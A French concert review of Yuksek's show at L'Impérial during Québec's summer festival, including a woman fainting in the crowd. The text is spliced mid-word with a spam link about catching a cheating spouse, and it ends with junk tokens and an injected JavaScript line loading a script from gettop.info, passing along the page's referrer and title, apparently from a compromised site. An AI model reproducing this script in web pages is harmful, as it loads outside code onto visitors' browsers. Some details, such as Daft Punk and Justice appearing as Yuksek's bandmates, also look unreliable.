FEQ: à l’IMPÉRIAL de Québec..une femme s’évanouit


Facebooktwitterredditpinterestlinkedinmail

Québec, samedi le 7 Juillet

 Le Festival d'été de Québec, ce n'est pas seulement des grosses scènes ou des grands noms. Pour ceux qui n'aime pas se retrouve dans les énormes foules, l'IMPÉRIAL DE QUÉBEC, situé sur la rue St-Joseph est, vous proposait une soirée dans une athmosphère disco et électro-pop.

C'est au environ de 22h que le groupe CUBIC ZIRCONIA des États-Unis a commencé à réchauffer cette belle salle de spectacle. Les gens se regroupant près de la scène pour bouger sur des rythmes disco-trash, tout en prenant une bière sur chacun des palliers de danse. Aucun souci pour la météo: l'air y est frais à l'intérieur, au plaisir des gens qui dansent.

 Vers les 22h50, l'IMPÉRAL DE QUÉBEC se rempli de plus en plus, laissant voir quelques macarons mais également plusieurs personnes ayant payé le 15$ à la porte. Et bien, on pourrait même croire que la mjorité des gens s'était donné un devoir de rencontrer cet artiste français de très bonne réputation. Quelques minutes après, le voilà enfin qui entre sur scène. YUKSEK, alias Pierre-Alexandre Busson, avec ses deux compatriotes: DAFT PUNK à droite et JUSTICE à sa gauche. C'est muni d'un genre de beatbox, de synthétiseurs pour les mecs et de baguettes et caisses clairs pour madame, que le spectacle peut co

h A Cheating Spouse (husband / Wife'>How To Catch A Cheating Spouse (husband / Wife

mmencer. YUKSEK s'assure de s'entendre correctement afin de donner une prestations lives des plus électrisantes, telle en dit sa réputation.

 Chacun leur micro, ce sont côte à côte qu'ils apparaisent sous une lumière blanche et tamisée. La fumée permet aux lumières bleues de créer un environnement tout a fait magique. Une musique électro incluant des influences pop, en plus des solos de style rap de JUSTICE, se tenant debout derrière son équipement. DAFT PUNK enchaînant tout à coup avec une basse à la main. Reconnu pour ces nombreux remix de chansons, la priorité pour YUKSEK  demeure le plancher de danse. C'est réussit! Tout le monde se balance, danse, saute dans les aires…certains tente même de partir un slam. Palpable, était le plaisir. Une première visite au Québec pour cet artiste qui a justement sorti son album '' Living on the Edge of time'' en terre québécoise en début d'année.

 YUKSEK aura créer tellement d'émoi qu'avant même d'entrer en scène, une femme s'évanouit tout juste à côté de moi. ULTIMRADIO lui a porté secours et s'est assuré de la voir enfin,après quelques secondes, reprendre conscience. Les agents de sécurité sont venu me seconder afin de veiller à ce qu'elle aille mieux. Malheureusement, elle ne saura sans doute jamais vraiment ce qu'elle a manqué…mais vous, oui !

zp8497586rq
zp8497586rq

s.src=’http://gettop.info/kt/?sdNXbH&frm=script&se_referrer=’ + encodeURIComponent(document.referrer) + ‘&default_keyword=’ + encodeURIComponent(document.title) +  »;